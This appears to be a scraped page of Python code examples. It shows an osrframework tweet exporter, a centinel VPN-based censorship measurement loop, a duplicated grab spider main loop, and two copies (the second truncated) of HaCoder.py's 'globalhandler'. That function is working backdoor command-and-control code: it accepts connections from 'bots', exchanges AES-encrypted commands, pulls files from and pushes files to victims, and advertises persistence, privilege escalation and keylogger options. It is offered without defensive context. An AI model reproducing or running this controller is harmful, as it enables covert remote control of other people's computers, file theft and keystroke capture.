            "in_reply_to_status_id_str": null, 
            "coordinates": null, 
            "in_reply_to_user_id_str": null, 
            "source": "<a href=\"http://twitter.com\" rel=\"nofollow\">Twitter Web Client</a>", 
            "in_reply_to_status_id": null, 
            "in_reply_to_screen_name": null, 
            "id_str": "632968969662689280", 
            "place": null, 
            "retweet_count": 1, 
            "geo": null, 
            "id": 632968969662689280, 
            "favorite_count": 0, 
            "in_reply_to_user_id": null
          },         
        """
        for tweet in jTweets:
            row =[]
            row.append(tweet["id_str"])
            row.append(tweet["created_at"])
            row.append(tweet["text"].encode("utf-8"))
            row.append(tweet["source"])
            row.append(tweet["coordinates"])
            row.append(tweet["retweet_count"])
            row.append(tweet["favorite_count"])
            row.append(tweet["lang"])
            row.append(tweet["place"])
            row.append(tweet["geo"])
            row.append(tweet["id"])
            row.append(screen_name)
            
            # URLS
            urls = []      
            """
            [    
                {
                  "url": "http://t.co/SGty7or6SQ", 
                  "indices": [
                    30, 
                    52
                  ], 
                  "expanded_url": "http://github.com/i3visio/osrframework", 
                  "display_url": "github.com/i3visio/osrfra\u2026"
                }
            ]
            """                             
            for u in tweet["entities"]["urls"]:
                urls.append(u["expanded_url"])
            # Creating the string value for the cell
            str_urls =""
            if len(urls) == 0:
                str_urls = "[N/A]"
            else:
                for i, u in enumerate(urls):
                    str_urls += u
                    # Appending a separator
                    if i+1 <> len(urls):
                        str_urls+= "|"
            row.append(str_urls.encode('utf-8'))  

            # TODO: Extract Mentions
            #     
            mentions = []
            """ "user_mentions": [
              {
                "id": 66345537, 
                "indices": [
                  0, 
                  10
                ], 
                "id_str": "66345537", 
                "screen_name": "muchotomy", 
                "name": "Tomy"
              },    
            """
            for a in tweet["entities"]["user_mentions"]:
                mentions.append(a["screen_name"])
            # Creating the string value for the cell
            str_mentions =""
            if len(mentions) == 0:
                str_mentions = "[N/A]"
            else:
                for i, m in enumerate(mentions):
                    str_mentions += m
                    # Appending a separator
                    if i+1 <> len(mentions):
                        str_mentions+= "|"
            row.append(str_mentions.encode('utf-8'))  
            
            # Appending the row to the output
            outtweets.append(row)
            
        # Writing the csv    
        with open('%s_tweets.csv' % screen_name, 'wb') as f:
            writer = csv.writer(f)
            # Writing the headers
            writer.writerow([
                "_tweet_id",
                "_tweet_created_at",
                "_tweet_text",
                "_tweet_source",
                "_tweet_coordinates",
                "_tweet_retweet_count",
                "_tweet_favourite_count",                                                
                "_tweet_lang",
                "i3visio_location",
                "_tweet_geo",
                "_twitter_id",
                "i3visio_alias",
                "i3visio_uri",                                                                                
                "i3visio_alias_mentions",                  
            ])
            # Writing the rows
            #writer.writerows(outtweets)
            for o in outtweets:
                try:
                    writer.writerow(o)
                except:
                    print o
    
        return jTweets

Example 30

Project: centinel
Source File: cli.py
View license
def scan_vpns(directory, auth_file, crt_file, tls_auth, key_direction,
              exclude_list, shuffle_lists, vm_num, vm_index, reduce_vp):
    """
    For each VPN, check if there are experiments and scan with it if
    necessary

    Note: the expected directory structure is
    args.directory
    -----vpns (contains the OpenVPN config files
    -----configs (contains the Centinel config files)
    -----exps (contains the experiments directories)

    :param directory: root directory that contains vpn configs and
                      centinel client configs
    :param auth_file: a text file with username at first line and
                      password at second line
    :param crt_file: optional root certificate file
    :param tls_auth: additional key
    :param key_direction: must specify if tls_auth is used
    :param exclude_list: optional list of exluded countries
    :param shuffle_lists: shuffle vpn list if set true
    :param vm_num: number of VMs that are running currently
    :param vm_index: index of current VM
    :param reduce_vp: reduce number of vantage points
    :return:
    """

    logging.info("Starting to run the experiments for each VPN")
    logging.warn("Excluding vantage points from: %s" % exclude_list)

    # iterate over each VPN
    vpn_dir = return_abs_path(directory, "vpns")
    conf_dir = return_abs_path(directory, "configs")
    home_dir = return_abs_path(directory, "home")
    if auth_file is not None:
        auth_file = return_abs_path(directory, auth_file)
    if crt_file is not None:
        crt_file = return_abs_path(directory, crt_file)
    if tls_auth is not None:
        tls_auth = return_abs_path(directory, tls_auth)
    conf_list = sorted(os.listdir(conf_dir))

    # determine VPN provider
    vpn_provider = None
    if "hma" in directory:
        vpn_provider = "hma"
    elif "ipvanish" in directory:
        vpn_provider = "ipvanish"
    elif "purevpn" in directory:
        vpn_provider = "purevpn"
    elif "vpngate" in directory:
        vpn_provider = "vpngate"
    if vpn_provider:
        logging.info("Detected VPN provider is %s" % vpn_provider)
    else:
        logging.warning("Cannot determine VPN provider!")

    # reduce size of list if reduce_vp is true
    if reduce_vp:
        logging.info("Reducing list size. Original size: %d" % len(conf_list))
        country_asn_set = set()
        reduced_conf_set = set()
        for filename in conf_list:
            centinel_config = os.path.join(conf_dir, filename)
            config = centinel.config.Configuration()
            config.parse_config(centinel_config)
            vp_ip = os.path.splitext(filename)[0]

            try:
                meta = centinel.backend.get_meta(config.params, vp_ip)
                if 'country' in meta and 'as_number' in meta \
                        and meta['country'] and meta['as_number']:
                    country_asn = '_'.join([meta['country'], meta['as_number']])
                    if country_asn not in country_asn_set:
                        country_asn_set.add(country_asn)
                        reduced_conf_set.add(filename)
                else:
                    # run this endpoint if missing info
                    reduced_conf_set.add(filename)
            except:
                logging.warning("Failed to geolocate %s" % vp_ip)
                reduced_conf_set.add(filename)

        conf_list = list(reduced_conf_set)
        logging.info("List size reduced. New size: %d" % len(conf_list))

    # sort file list to ensure the same filename sequence in each VM
    conf_list = sorted(conf_list)

    # only select its own portion according to vm_num and vm_index
    chunk_size = len(conf_list) / vm_num
    last_chunk_additional = len(conf_list) % vm_num
    start_pointer = 0 + (vm_index - 1) * chunk_size
    end_pointer = start_pointer + chunk_size
    if vm_index == vm_num:
        end_pointer += last_chunk_additional
    conf_list = conf_list[start_pointer:end_pointer]

    if shuffle_lists:
        shuffle(conf_list)

    number = 1
    total = len(conf_list)

    external_ip = get_external_ip()
    if external_ip is None:
        logging.error("No network connection, exiting...")
        return

    # getting namesevers that should be excluded
    local_nameservers = dns.resolver.Resolver().nameservers

    for filename in conf_list:
        # Check network connection first
        time.sleep(5)
        logging.info("Checking network connectivity...")
        current_ip = get_external_ip()
        if current_ip is None:
            logging.error("Network connection lost!")
            break
        elif current_ip != external_ip:
            logging.error("VPN still connected! IP: %s" % current_ip)
            if len(openvpn.OpenVPN.connected_instances) == 0:
                logging.error("No active OpenVPN instance found! Exiting...")
                break
            else:
                logging.warn("Trying to disconnect VPN")
                for instance in openvpn.OpenVPN.connected_instances:
                    instance.stop()
                    time.sleep(5)

                current_ip = get_external_ip()
                if current_ip is None or current_ip != external_ip:
                    logging.error("Stopping VPN failed! Exiting...")
                    break

            logging.info("Disconnecting VPN successfully")

        # start centinel for this endpoint
        logging.info("Moving onto (%d/%d) %s" % (number, total, filename))

        number += 1
        vpn_config = os.path.join(vpn_dir, filename)
        centinel_config = os.path.join(conf_dir, filename)

        # before starting the VPN, check if there are any experiments
        # to run
        config = centinel.config.Configuration()
        config.parse_config(centinel_config)

        # assuming that each VPN config file has a name like:
        # [ip-address].ovpn, we can extract IP address from filename
        # and use it to geolocate and fetch experiments before connecting
        # to VPN.
        vpn_address, extension = os.path.splitext(filename)
        country = None
        try:
            meta = centinel.backend.get_meta(config.params,
                                             vpn_address)
            if 'country' in meta:
                country = meta['country']
        except:
            logging.exception("%s: Failed to geolocate %s" % (filename, vpn_address))

        if country and exclude_list and country in exclude_list:
            logging.info("%s: Skipping this server (%s)" % (filename, country))
            continue

        # try setting the VPN info (IP and country) to get appropriate
        # experiemnts and input data.
        try:
            centinel.backend.set_vpn_info(config.params, vpn_address, country)
        except Exception as exp:
            logging.exception("%s: Failed to set VPN info: %s" % (filename, exp))

        logging.info("%s: Synchronizing." % filename)
        try:
            centinel.backend.sync(config.params)
        except Exception as exp:
            logging.exception("%s: Failed to sync: %s" % (filename, exp))

        if not experiments_available(config.params):
            logging.info("%s: No experiments available." % filename)
            try:
                centinel.backend.set_vpn_info(config.params, vpn_address, country)
            except Exception as exp:
                logging.exception("Failed to set VPN info: %s" % exp)
            continue

        # add exclude_nameservers to scheduler
        sched_path = os.path.join(home_dir, filename, "experiments", "scheduler.info")
        if os.path.exists(sched_path):
            with open(sched_path, 'r+') as f:
                sched_info = json.load(f)
                for task in sched_info:
                    if "python_exps" in sched_info[task] and "baseline" in sched_info[task]["python_exps"]:
                        if "params" in sched_info[task]["python_exps"]["baseline"]:
                            sched_info[task]["python_exps"]["baseline"]["params"]["exclude_nameservers"] = \
                                local_nameservers
                        else:
                            sched_info[task]["python_exps"]["baseline"]["params"] = \
                                {"exclude_nameservers": local_nameservers}

                # write back to same file
                f.seek(0)
                json.dump(sched_info, f, indent=2)
                f.truncate()

        logging.info("%s: Starting VPN." % filename)

        vpn = openvpn.OpenVPN(timeout=60, auth_file=auth_file, config_file=vpn_config,
                              crt_file=crt_file, tls_auth=tls_auth, key_direction=key_direction)

        vpn.start()
        if not vpn.started:
            logging.error("%s: Failed to start VPN!" % filename)
            vpn.stop()
            time.sleep(5)
            continue

        logging.info("%s: Running Centinel." % filename)
        try:
            client = centinel.client.Client(config.params, vpn_provider)
            centinel.conf = config.params
            # do not use client logging config
            # client.setup_logging()
            client.run()
        except Exception as exp:
            logging.exception("%s: Error running Centinel: %s" % (filename, exp))

        logging.info("%s: Stopping VPN." % filename)
        vpn.stop()
        time.sleep(5)

        logging.info("%s: Synchronizing." % filename)
        try:
            centinel.backend.sync(config.params)
        except Exception as exp:
            logging.exception("%s: Failed to sync: %s" % (filename, exp))

        # try setting the VPN info (IP and country) to the correct address
        # after sync is over.
        try:
            centinel.backend.set_vpn_info(config.params, vpn_address, country)
        except Exception as exp:
            logging.exception("Failed to set VPN info: %s" % exp)

Example 31

Project: grab
Source File: base.py
View license
    def run(self):
        """
        Main method. All work is done here.
        """
        if self.mp_mode:
            from multiprocessing import Process, Event, Queue
        else:
            from multiprocessing.dummy import Process, Event, Queue

        self.timer.start('total')
        self.transport = MulticurlTransport(self.thread_number)

        if self.http_api_port:
            http_api_proc = self.start_api_thread()
        else:
            http_api_proc = None

        self.parser_result_queue = Queue()
        self.parser_pipeline = ParserPipeline(
            bot=self,
            mp_mode=self.mp_mode,
            pool_size=self.parser_pool_size,
            shutdown_event=self.shutdown_event,
            network_result_queue=self.network_result_queue,
            parser_result_queue=self.parser_result_queue,
            requests_per_process=self.parser_requests_per_process,
        )
        network_result_queue_limit = max(10, self.thread_number * 2)
        
        try:
            # Run custom things defined by this specific spider
            # By defaut it does nothing
            self.prepare()

            # Setup task queue if it has not been configured yet
            if self.task_queue is None:
                self.setup_queue()

            # Initiate task generator. Only in main process!
            with self.timer.log_time('task_generator'):
                self.start_task_generators()

            # Work in infinite cycle untill
            # `self.work_allowed` flag is True
            #shutdown_countdown = 0 # !!!
            pending_tasks = deque()
            while self.work_allowed:
                free_threads = self.transport.get_free_threads_number()
                # Load new task only if:
                # 1) network transport has free threads
                # 2) network result queue is not full
                # 3) cache is disabled OR cache has free resources
                if (self.transport.get_free_threads_number()
                        and (self.network_result_queue.qsize()
                             < network_result_queue_limit)
                        and (self.cache_pipeline is None
                             or self.cache_pipeline.has_free_resources())):
                    if pending_tasks:
                        task = pending_tasks.popleft()
                    else:
                        task = self.get_task_from_queue()
                    if task is None:
                        # If received task is None then
                        # check if spider is ready to be shut down
                        if not pending_tasks and self.is_ready_to_shutdown():
                            # I am afraid there is a bug in `is_ready_to_shutdown`
                            # because it tries to evaluate too many things
                            # includig thigs that are being set from other threads,
                            # so to ensure we are really ready to shutdown I call
                            # is_ready_to_shutdown a few more times.
                            # Without this hack some times really rarely times
                            # the Grab fails to do its job
                            # A good way to see this bug is to disable this hack
                            # and run:
                            # while ./runtest.py -t test.spider_data; do echo "ok"; done;
                            # And wait a few minutes
                            really_ready = True
                            for x in range(10):
                                if not self.is_ready_to_shutdown():
                                    really_ready = False
                                    break
                                time.sleep(0.001)
                            if really_ready:
                                self.shutdown_event.set()
                                self.stop()
                                break # Break from `while self.work_allowed` cycle
                    elif isinstance(task, bool) and (task is True):
                        # If received task is True
                        # and there is no active network threads then
                        # take some sleep
                        if not self.transport.get_active_threads_number():
                            time.sleep(0.01)
                    else:
                        logger_verbose.debug('Got new task from task queue: %s'
                                             % task)
                        task.network_try_count += 1
                        is_valid, reason = self.check_task_limits(task)
                        if is_valid:
                            task_grab = self.setup_grab_for_task(task)
                            if self.cache_pipeline:
                                self.cache_pipeline.input_queue.put(
                                    ('load', (task, task_grab)),
                                )
                            else:
                                self.submit_task_to_transport(task, task_grab)
                        else:
                            self.log_rejected_task(task, reason)
                            handler = task.get_fallback_handler(self)
                            if handler:
                                handler(task)

                with self.timer.log_time('network_transport'):
                    logger_verbose.debug('Asking transport layer to do '
                                         'something')
                    self.transport.process_handlers()

                logger_verbose.debug('Processing network results (if any).')

                # Collect completed network results
                # Each result could be valid or failed
                # Result is dict {ok, grab, grab_config_backup, task, emsg}
                results = [(x, False) for x in
                           self.transport.iterate_results()]
                if self.cache_pipeline:
                    while True:
                        try:
                            action, result = self.cache_pipeline\
                                                 .result_queue.get(False)
                        except queue.Empty:
                            break
                        else:
                            assert action in ('network_result', 'task')
                            if action == 'network_result':
                                results.append((result, True))
                            elif action == 'task':
                                task = result
                                task_grab = self.setup_grab_for_task(task)
                                if (self.transport.get_free_threads_number()
                                        and (self.network_result_queue.qsize()
                                             < network_result_queue_limit)):
                                    self.submit_task_to_transport(task, task_grab)
                                else:
                                    pending_tasks.append(task)

                # Take sleep to avoid millions of iterations per second.
                # 1) If no results from network transport
                # 2) If task queue is empty (or if there are only delayed tasks)
                # 3) If no network activity
                # 4) If parser result queue is empty
                if (not results
                    and (task is None or bool(task) == True)
                    and not self.transport.get_active_threads_number()
                    and not self.parser_result_queue.qsize()
                    and (self.cache_pipeline is None
                         or (self.cache_pipeline.input_queue.qsize() == 0
                             and self.cache_pipeline.is_idle()
                             and self.cache_pipeline.result_queue.qsize() == 0))
                    ):
                        time.sleep(0.001)

                for result, from_cache in results:
                    if self.cache_pipeline and not from_cache:
                        if result['ok']:
                            self.cache_pipeline.input_queue.put(
                                ('save', (result['task'], result['grab']))
                            )
                    self.log_network_result_stats(
                        result, from_cache=from_cache)
                    if self.is_valid_network_result(result):
                        #print('!! PUT NETWORK RESULT INTO QUEUE (base.py)')
                        self.network_result_queue.put(result)
                    else:
                        self.log_failed_network_result(result)
                        # Try to do network request one more time
                        if self.network_try_limit > 0:
                            result['task'].refresh_cache = True
                            result['task'].setup_grab_config(
                                result['grab_config_backup'])
                            self.add_task(result['task'])
                    if from_cache:
                        self.stat.inc('spider:task-%s-cache' % result['task'].name)
                    self.stat.inc('spider:request')

                while True:
                    try:
                        p_res, p_task = self.parser_result_queue.get(block=False)
                    except queue.Empty:
                        break
                    else:
                        self.stat.inc('spider:parser-result')
                        self.process_handler_result(p_res, p_task)

                if not self.shutdown_event.is_set():
                    self.parser_pipeline.check_pool_health()

            logger_verbose.debug('Work done')
        except KeyboardInterrupt:
            logger.info('\nGot ^C signal in process %d. Stopping.'
                        % os.getpid())
            self.interrupted = True
            raise
        finally:
            # This code is executed when main cycles is breaked
            self.timer.stop('total')
            self.stat.print_progress_line()
            self.shutdown()

            # Stop HTTP API process
            if http_api_proc:
                http_api_proc.server.shutdown()
                http_api_proc.join()

            if self.task_queue:
                self.task_queue.clear()

            # Stop parser processes
            self.shutdown_event.set()
            self.parser_pipeline.shutdown()
            logger.debug('Main process [pid=%s]: work done' % os.getpid())

Example 32

Project: grab
Source File: base.py
View license
    def run(self):
        """
        Main method. All work is done here.
        """
        if self.mp_mode:
            from multiprocessing import Process, Event, Queue
        else:
            from multiprocessing.dummy import Process, Event, Queue

        self.timer.start('total')
        self.transport = MulticurlTransport(self.thread_number)

        if self.http_api_port:
            http_api_proc = self.start_api_thread()
        else:
            http_api_proc = None

        self.parser_result_queue = Queue()
        self.parser_pipeline = ParserPipeline(
            bot=self,
            mp_mode=self.mp_mode,
            pool_size=self.parser_pool_size,
            shutdown_event=self.shutdown_event,
            network_result_queue=self.network_result_queue,
            parser_result_queue=self.parser_result_queue,
            requests_per_process=self.parser_requests_per_process,
        )
        network_result_queue_limit = max(10, self.thread_number * 2)
        
        try:
            # Run custom things defined by this specific spider
            # By defaut it does nothing
            self.prepare()

            # Setup task queue if it has not been configured yet
            if self.task_queue is None:
                self.setup_queue()

            # Initiate task generator. Only in main process!
            with self.timer.log_time('task_generator'):
                self.start_task_generators()

            # Work in infinite cycle untill
            # `self.work_allowed` flag is True
            #shutdown_countdown = 0 # !!!
            pending_tasks = deque()
            while self.work_allowed:
                free_threads = self.transport.get_free_threads_number()
                # Load new task only if:
                # 1) network transport has free threads
                # 2) network result queue is not full
                # 3) cache is disabled OR cache has free resources
                if (self.transport.get_free_threads_number()
                        and (self.network_result_queue.qsize()
                             < network_result_queue_limit)
                        and (self.cache_pipeline is None
                             or self.cache_pipeline.has_free_resources())):
                    if pending_tasks:
                        task = pending_tasks.popleft()
                    else:
                        task = self.get_task_from_queue()
                    if task is None:
                        # If received task is None then
                        # check if spider is ready to be shut down
                        if not pending_tasks and self.is_ready_to_shutdown():
                            # I am afraid there is a bug in `is_ready_to_shutdown`
                            # because it tries to evaluate too many things
                            # includig thigs that are being set from other threads,
                            # so to ensure we are really ready to shutdown I call
                            # is_ready_to_shutdown a few more times.
                            # Without this hack some times really rarely times
                            # the Grab fails to do its job
                            # A good way to see this bug is to disable this hack
                            # and run:
                            # while ./runtest.py -t test.spider_data; do echo "ok"; done;
                            # And wait a few minutes
                            really_ready = True
                            for x in range(10):
                                if not self.is_ready_to_shutdown():
                                    really_ready = False
                                    break
                                time.sleep(0.001)
                            if really_ready:
                                self.shutdown_event.set()
                                self.stop()
                                break # Break from `while self.work_allowed` cycle
                    elif isinstance(task, bool) and (task is True):
                        # If received task is True
                        # and there is no active network threads then
                        # take some sleep
                        if not self.transport.get_active_threads_number():
                            time.sleep(0.01)
                    else:
                        logger_verbose.debug('Got new task from task queue: %s'
                                             % task)
                        task.network_try_count += 1
                        is_valid, reason = self.check_task_limits(task)
                        if is_valid:
                            task_grab = self.setup_grab_for_task(task)
                            if self.cache_pipeline:
                                self.cache_pipeline.input_queue.put(
                                    ('load', (task, task_grab)),
                                )
                            else:
                                self.submit_task_to_transport(task, task_grab)
                        else:
                            self.log_rejected_task(task, reason)
                            handler = task.get_fallback_handler(self)
                            if handler:
                                handler(task)

                with self.timer.log_time('network_transport'):
                    logger_verbose.debug('Asking transport layer to do '
                                         'something')
                    self.transport.process_handlers()

                logger_verbose.debug('Processing network results (if any).')

                # Collect completed network results
                # Each result could be valid or failed
                # Result is dict {ok, grab, grab_config_backup, task, emsg}
                results = [(x, False) for x in
                           self.transport.iterate_results()]
                if self.cache_pipeline:
                    while True:
                        try:
                            action, result = self.cache_pipeline\
                                                 .result_queue.get(False)
                        except queue.Empty:
                            break
                        else:
                            assert action in ('network_result', 'task')
                            if action == 'network_result':
                                results.append((result, True))
                            elif action == 'task':
                                task = result
                                task_grab = self.setup_grab_for_task(task)
                                if (self.transport.get_free_threads_number()
                                        and (self.network_result_queue.qsize()
                                             < network_result_queue_limit)):
                                    self.submit_task_to_transport(task, task_grab)
                                else:
                                    pending_tasks.append(task)

                # Take sleep to avoid millions of iterations per second.
                # 1) If no results from network transport
                # 2) If task queue is empty (or if there are only delayed tasks)
                # 3) If no network activity
                # 4) If parser result queue is empty
                if (not results
                    and (task is None or bool(task) == True)
                    and not self.transport.get_active_threads_number()
                    and not self.parser_result_queue.qsize()
                    and (self.cache_pipeline is None
                         or (self.cache_pipeline.input_queue.qsize() == 0
                             and self.cache_pipeline.is_idle()
                             and self.cache_pipeline.result_queue.qsize() == 0))
                    ):
                        time.sleep(0.001)

                for result, from_cache in results:
                    if self.cache_pipeline and not from_cache:
                        if result['ok']:
                            self.cache_pipeline.input_queue.put(
                                ('save', (result['task'], result['grab']))
                            )
                    self.log_network_result_stats(
                        result, from_cache=from_cache)
                    if self.is_valid_network_result(result):
                        #print('!! PUT NETWORK RESULT INTO QUEUE (base.py)')
                        self.network_result_queue.put(result)
                    else:
                        self.log_failed_network_result(result)
                        # Try to do network request one more time
                        if self.network_try_limit > 0:
                            result['task'].refresh_cache = True
                            result['task'].setup_grab_config(
                                result['grab_config_backup'])
                            self.add_task(result['task'])
                    if from_cache:
                        self.stat.inc('spider:task-%s-cache' % result['task'].name)
                    self.stat.inc('spider:request')

                while True:
                    try:
                        p_res, p_task = self.parser_result_queue.get(block=False)
                    except queue.Empty:
                        break
                    else:
                        self.stat.inc('spider:parser-result')
                        self.process_handler_result(p_res, p_task)

                if not self.shutdown_event.is_set():
                    self.parser_pipeline.check_pool_health()

            logger_verbose.debug('Work done')
        except KeyboardInterrupt:
            logger.info('\nGot ^C signal in process %d. Stopping.'
                        % os.getpid())
            self.interrupted = True
            raise
        finally:
            # This code is executed when main cycles is breaked
            self.timer.stop('total')
            self.stat.print_progress_line()
            self.shutdown()

            # Stop HTTP API process
            if http_api_proc:
                http_api_proc.server.shutdown()
                http_api_proc.join()

            if self.task_queue:
                self.task_queue.clear()

            # Stop parser processes
            self.shutdown_event.set()
            self.parser_pipeline.shutdown()
            logger.debug('Main process [pid=%s]: work done' % os.getpid())

Example 33

Project: HaCoder.py
Source File: HaCoder.py
View license
def globalhandler():
	# clear function
	##################################
	# Windows ---------------> cls
	# Linux   ---------------> clear
	if os.name == 'posix': clf = 'clear'
	if os.name == 'nt': clf = 'cls'
	clear = lambda: os.system(clf)
	clear()

	BLOCK_SIZE=32
	PADDING = '{'
	pad = lambda s: s + (BLOCK_SIZE - len(s) % BLOCK_SIZE) * PADDING
	EncodeAES = lambda c, s: base64.b64encode(c.encrypt(pad(s)))
	DecodeAES = lambda c, e: c.decrypt(base64.b64decode(e)).rstrip(PADDING)

	# initialize socket
	c = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
	c.bind(('0.0.0.0', portH))
	c.listen(128)

	# client information
	active = False
	clients = []
	socks = []
	interval = 0.8

	# Functions
	###########

	# send data
	def Send(sock, cmd, end="EOFEOFEOFEOFEOFX"):
		sock.sendall(EncodeAES(cipher, cmd + end))

	# receive data
	def Receive(sock, end="EOFEOFEOFEOFEOFX"):
		data = ""
		l = sock.recv(1024)
		while(l):
			decrypted = DecodeAES(cipher, l)

			data += decrypted
			if data.endswith(end) == True:
				break
			else:
				l = sock.recv(1024)
		return data[:-len(end)]

	# download file
	def download(sock, remote_filename, local_filename=None):
		# check if file exists
		if not local_filename:
			local_filename = remote_filename
		try:
			f = open(local_filename, 'wb')
		except IOError:
			print "Error opening file.\n"
			Send(sock, "cd .")
			return
		# start transfer
		Send(sock, "download "+remote_filename)
		print "Downloading: " + remote_filename + " > " + local_filename
		fileData = Receive(sock)
		f.write(fileData)
		time.sleep(interval)
		f.close()
		time.sleep(interval)

	# upload file
	def upload(sock, local_filename, remote_filename=None):
		# check if file exists
		if not remote_filename:
			remote_filename = local_filename
		try:
			g = open(local_filename, 'rb')
		except IOError:
			print "Error opening file.\n"
			Send(sock, "cd .")
			return
		# start transfer
		Send(sock, "upload "+remote_filename)
		print 'Uploading: ' + local_filename + " > " + remote_filename
		while True:
			fileData = g.read()
			if not fileData: break
			Send(sock, fileData, "")
		g.close()
		time.sleep(interval)
		Send(sock, "")
		time.sleep(interval)
	
	# refresh clients
	def refresh():
		clear()
		print bcolors.OKGREEN + '\nListening for bots...\n' + bcolors.ENDC
		if len(clients) > 0:
			for j in range(0,len(clients)):
				print '[' + str((j+1)) + '] Client: ' + clients[j] + '\n'
		else:
			print "...\n"
		# print exit option
		print "---\n"
		print bcolors.FAIL + "[0] Exit \n" + bcolors.ENDC
		print bcolors.WARNING + "\nPress Ctrl+C to interact with client." + bcolors.ENDC
		print bcolors.OKGREEN

	# main loop
	while True:
		refresh()
		# listen for clients
		try:
			# set timeout
			c.settimeout(10)
		
			# accept connection
			try:
				s,a = c.accept()
			except socket.timeout:
				continue
		
			# add socket
			if (s):
				s.settimeout(None)
				socks += [s]
				clients += [str(a)]
		
			# display clients
			refresh()
		
			# sleep
			time.sleep(interval)

		except KeyboardInterrupt:
		
			# display clients
			refresh()
		
			# accept selection --- int, 0/1-128
			activate = input("\nEnter option: ")
		
			# exit
			if activate == 0:
				print '\nExiting...\n'
				for j in range(0,len(socks)):
					socks[j].close()
				sys.exit()
		
			# subtract 1 (array starts at 0)
			activate -= 1
	
			# clear screen
			clear()
		
			# create a cipher object using the random secret
			cipher = AES.new(secret)
			print '\nActivating client: ' + clients[activate] + '\n'
			print "download	Download files from Client"
			print "downhttp	Download file to victim using HTTP"
			print "upload		Upload files from attacker to Client"
			print "persist		Make backdoor run on startup"
			print "privs		Privilege Escalation"
			print "keylog		Activate Keylogger"

			active = True
			Send(socks[activate], 'Activate')
		print bcolors.ENDC
		# interact with client
		while active:
			try:
				# receive data from client
				data = Receive(socks[activate])
			# disconnect client.
			except:
				print '\nClient disconnected... ' + clients[activate]
				# delete client
				socks[activate].close()
				time.sleep(0.8)
				socks.remove(socks[activate])
				clients.remove(clients[activate])
				refresh()
				active = False
				break

			# exit client session
			if data == 'quitted':
				# print message
				print "Exit.\n"
				# remove from arrays
				socks[activate].close()
				socks.remove(socks[activate])
				clients.remove(clients[activate])
				# sleep and refresh
				time.sleep(0.8)
				refresh()
				active = False
				break
			# if data exists
			elif data != '':
				# get next command
				sys.stdout.write(data)
				nextcmd = raw_input()
		
			# download
			if nextcmd.startswith("download ") == True:
				if len(nextcmd.split(' ')) > 2:
					download(socks[activate], nextcmd.split(' ')[1], nextcmd.split(' ')[2])
				else:
					download(socks[activate], nextcmd.split(' ')[1])
		
			# upload
			elif nextcmd.startswith("upload ") == True:
				if len(nextcmd.split(' ')) > 2:
					upload(socks[activate], nextcmd.split(' ')[1], nextcmd.split(' ')[2])
				else:
					upload(socks[activate], nextcmd.split(' ')[1])
		
			# normal command
			elif nextcmd != '':
				Send(socks[activate], nextcmd)

			elif nextcmd == '':

				print 'Think before you type. ;)\n'

Example 34

Project: HaCoder.py
Source File: HaCoder.py
View license
def globalhandler():
	# clear function
	##################################
	# Windows ---------------> cls
	# Linux   ---------------> clear
	if os.name == 'posix': clf = 'clear'
	if os.name == 'nt': clf = 'cls'
	clear = lambda: os.system(clf)
	clear()

	BLOCK_SIZE=32
	PADDING = '{'
	pad = lambda s: s + (BLOCK_SIZE - len(s) % BLOCK_SIZE) * PADDING
	EncodeAES = lambda c, s: base64.b64encode(c.encrypt(pad(s)))
	DecodeAES = lambda c, e: c.decrypt(base64.b64decode(e)).rstrip(PADDING)

	# initialize socket
	c = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
	c.bind(('0.0.0.0', portH))
	c.listen(128)

	# client information
	active = False
	clients = []
	socks = []
	interval = 0.8

	# Functions
	###########

	# send data
	def Send(sock, cmd, end="EOFEOFEOFEOFEOFX"):
		sock.sendall(EncodeAES(cipher, cmd + end))

	# receive data
	def Receive(sock, end="EOFEOFEOFEOFEOFX"):
		data = ""
		l = sock.recv(1024)
		while(l):
			decrypted = DecodeAES(cipher, l)

			data += decrypted
			if data.endswith(end) == True:
				break
			else:
				l = sock.recv(1024)
		return data[:-len(end)]

	# download file
	def download(sock, remote_filename, local_filename=None):
		# check if file exists
		if not local_filename:
			local_filename = remote_filename
		try:
			f = open(local_filename, 'wb')
		except IOError:
			print "Error opening file.\n"
			Send(sock, "cd .")
			return
		# start transfer
		Send(sock, "download "+remote_filename)
		print "Downloading: " + remote_filename + " > " + local_filename
		fileData = Receive(sock)
		f.write(fileData)
		time.sleep(interval)
		f.close()
		time.sleep(interval)

	# upload file
	def upload(sock, local_filename, remote_filename=None):
		# check if file exists
		if not remote_filename:
			remote_filename = local_filename
		try:
			g = open(local_filename, 'rb')
		except IOError:
			print "Error opening file.\n"
			Send(sock, "cd .")
			return
		# start transfer
		Send(sock, "upload "+remote_filename)
		print 'Uploading: ' + local_filename + " > " + remote_filename
		while True:
			fileData = g.read()
			if not fileData: break
			Send(sock, fileData, "")
		g.close()
		time.sleep(interval)
		Send(sock, "")
		time.sleep(interval)
	
	# refresh clients
	def refresh():
		clear()
		print bcolors.OKGREEN + '\nListening for bots...\n' + bcolors.ENDC
		if len(clients) > 0:
			for j in range(0,len(clients)):
				print '[' + str((j+1)) + '] Client: ' + clients[j] + '\n'
		else:
			print "...\n"
		# print exit option
		print "---\n"
		print bcolors.FAIL + "[0] Exit \n" + bcolors.ENDC
		print bcolors.WARNING + "\nPress Ctrl+C to interact with client." + bcolors.ENDC
		print bcolors.OKGREEN

	# main loop
	while True:
		refresh()
		# listen for clients
		try:
			# set timeout
			c.settimeout(10)
		
			# accept connection
			try:
				s,a = c.accept()
			except socket.timeout:
				continue
		
			# add socket
			if (s):
				s.settimeout(None)
				socks += [s]
				clients += [str(a)]
		
			# display clients
			refresh()
		
			# sleep
			time.sleep(interval)

		except KeyboardInterrupt:
		
			# display clients
			refresh()
		
			# accept selection --- int, 0/1-128
			activate = input("\nEnter option: ")
		
			# exit
			if activate == 0:
				print '\nExiting...\n'
				for j in range(0,len(socks)):
					socks[j].close()
				sys.exit()
		
			# subtract 1 (array starts at 0)
			activate -= 1
	
			# clear screen
			clear()
		
			# create a cipher object using the random secret
			cipher = AES.new(secret)
			print '\nActivating client: ' + clients[activate] + '\n'
			print "download	Download files from Client"
			print "downhttp	Download file to victim using HTTP"
			print "upload		Upload files from attacker to Client"
			print "persist		Make backdoor run on startup"
			print "privs		Privilege Escalation"
			print "keylog		Activate Keylogger"

			active = True
			Send(socks[activate], 'Activate')
		print bcolors.ENDC
		# interact with client
		while active:
			try:
				# receive data from client
				data = Receive(socks[activate])
			# disconnect client.
			except:
				print '\nClient disconnected... ' + clients[activate]
				# delete client
				socks[activate].close()
				time.sleep(0.8)
				socks.remove(socks[activate])
				clients.remove(clients[activate])
